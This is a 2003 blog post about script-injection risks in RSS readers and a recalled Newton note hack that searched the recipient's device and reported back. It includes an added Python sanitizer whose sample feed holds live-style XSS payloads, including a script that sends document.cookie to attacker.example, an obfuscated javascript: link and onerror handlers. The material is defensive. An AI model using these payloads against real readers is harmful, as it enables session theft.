March 01, 2003

RSS virus?

A recent thread discusses possible security issues with embedded scripts inside RSS items. Basically the idea is that an RSS item could carry embedded scripting that attempts to wreak havoc when the reader renders it.

This reminds me of a hack I wrote for the Newton.

Greg Christie and I were interested in writing a series of extensions to the Newton's Notepad that would allow you to 'stamp' live data elements into notes. This was a parallel to a less robust feature found on the then competing Magic Cap units. The desire was to have a notepad, calendar or name entry stamped with items from each other. You'd create a note, stamp it with someone's name and a calendar item, and the note would contain live links.

This worked pretty well. We used a feature of the view system in an unexpected way. The view system supported an object having the ability to override default behaviors. We used this to capture when someone clicked on one of our stamps to transport them to the stamped item. Now, stay with me here because this is important. This worked great until you tried to send an item to someone else.

We then hacked the transport to allow it to 'flatten' these stamped items before sending them over to someone else. What we discovered, and this is the heinously evil part, is that the display system on the receiving end would dutifully execute our code the instant the user displayed the item. This would then 'dehydrate' the stored stamp and stuff the data out into live entries in the target machine. Worked like a charm.

I found an evil angle. I wrote a hack that would create a stamp that did searches. Upon receipt it would search the target machine and send back the results. Quite evil. I could send you a note that dug through your machine and gave me back whatever I'd asked of it. I never released this to the wild. But it did raise some questions about viruses and sandboxing. The Newton tanked long before this ever became an issue.

Where it became legend was during a MacWorld conference, SF I think. At the show I was exchanging electronic business cards with an Apple rep. The Newton let you do this via beaming infrared transfers. Just as we were about to do the transaction the rep stopped, put her hand over the IR port on her Newton and said "oh, wait a minute, you're Bill Kearney. I heard not to let you send me notes." I had to chuckle; laughed out loud in fact. Here's where a very handy feature of the OS had ended up being used for nefarious purposes and thus harmed its use for legitimate ones. Quite the parallel to scripting RSS in a mail client.

So I could say, been there, done that. RSS, with extremely rare exception, does not need live scripting embedded in it. Reader programs should attempt to neuter anything that looks like a script AND tell the user about it.
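To make the "neuter it AND tell the user" recommendation concrete, here is an added example of such a sanitizer in Python. It is not code from the original post; the function names, the sample feed and the list of "looks like a script" constructs are my own assumptions. It assumes an RSS 2.0 feed whose `description` elements carry HTML, parses each item with the standard library, strips script-bearing elements, `on*` event handlers and `javascript:`/`vbscript:`/`data:` URLs (after removing the whitespace and control characters browsers ignore inside a scheme), and returns a list of findings so the reader can show the user what was removed rather than silently dropping it.

```python
import html
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Elements whose entire contents are discarded (hypothetical policy for this example).
DANGEROUS_ELEMENTS = {"script", "iframe", "object", "embed", "applet", "style"}
# Elements that never carry a closing tag in HTML.
VOID_ELEMENTS = {"br", "img", "hr", "embed"}
# Attributes that may carry a URL and therefore a script scheme.
URL_ATTRS = {"href", "src"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def _normalized_scheme(value):
    # Browsers ignore control characters and whitespace before and inside the
    # scheme, so "java\tscript:" still executes; strip them before comparing.
    return re.sub(r"[\x00-\x20]", "", value).lower()


class ItemSanitizer(HTMLParser):
    """Rebuilds an HTML fragment, dropping script-like constructs and recording each removal."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.findings = []
        self._skipping = []  # stack of dangerous elements we are currently inside

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_ELEMENTS:
            self.findings.append(f"removed <{tag}> element")
            if tag not in VOID_ELEMENTS:
                # Contents up to the matching end tag are discarded. An unclosed
                # dangerous element swallows the rest of the item: failing closed.
                self._skipping.append(tag)
            return
        if self._skipping:
            return
        kept = []
        for name, value in attrs:  # HTMLParser has already unescaped the values
            lname = name.lower()
            if lname.startswith("on"):
                self.findings.append(f"removed {lname} handler on <{tag}>")
                continue
            if (lname in URL_ATTRS and value is not None
                    and _normalized_scheme(value).startswith(SCRIPT_SCHEMES)):
                self.findings.append(f"removed {lname} with script scheme on <{tag}>")
                continue
            kept.append((name, value))
        attr_text = "".join(
            f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
            for n, v in kept
        )
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in DANGEROUS_ELEMENTS:
            if self._skipping and self._skipping[-1] == tag:
                self._skipping.pop()
            return
        if not self._skipping and tag not in VOID_ELEMENTS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skipping:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skipping:
            self.out.append(f"&#{name};")


def neuter_item_html(fragment):
    """Return (sanitized_html, findings) for one RSS item description."""
    parser = ItemSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.findings


def sanitize_feed(rss_xml):
    """Return [(title, clean_description, findings)] for each <item> in an RSS 2.0 document.

    Note: for feeds from untrusted sources, parse with defusedxml rather than the
    stdlib parser to avoid entity-expansion attacks on the XML layer itself."""
    root = ET.fromstring(rss_xml)
    results = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        clean, findings = neuter_item_html(item.findtext("description", default=""))
        results.append((title, clean, findings))
    return results


# Constructed sample feed: one benign item and one carrying several script vectors.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>constructed test feed</title>
<item>
  <title>Plain item</title>
  <description><![CDATA[<p>Nothing to see <a href="http://example.com/">here</a>.</p>]]></description>
</item>
<item>
  <title>Hostile item</title>
  <description><![CDATA[<p onmouseover="steal()">Read <a href="java&#9;script:alert(1)">this</a>
<script>document.location='http://attacker.example/?c='+document.cookie</script>
<img src="x" onerror="steal()"><iframe src="http://attacker.example/"></iframe></p>]]></description>
</item>
</channel></rss>"""

if __name__ == "__main__":
    for title, clean, findings in sanitize_feed(SAMPLE_FEED):
        print(f"{title}: {clean!r}")
        for f in findings:
            print("  WARNING:", f)  # this is the "tell the user about it" part
```

The important design choice is that the sanitizer is an allow-through rebuild, not a regex blacklist over the raw string: the parser sees the same tag and attribute boundaries a browser would, so tricks like the tab inside `java&#9;script:` are handled by normalising the decoded attribute value rather than by guessing at encodings in the source text. Anything not recognised as dangerous is re-serialised with its attribute values re-escaped.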

Trust me on this one. Oh and here, let me send you a feed....


12:02 PM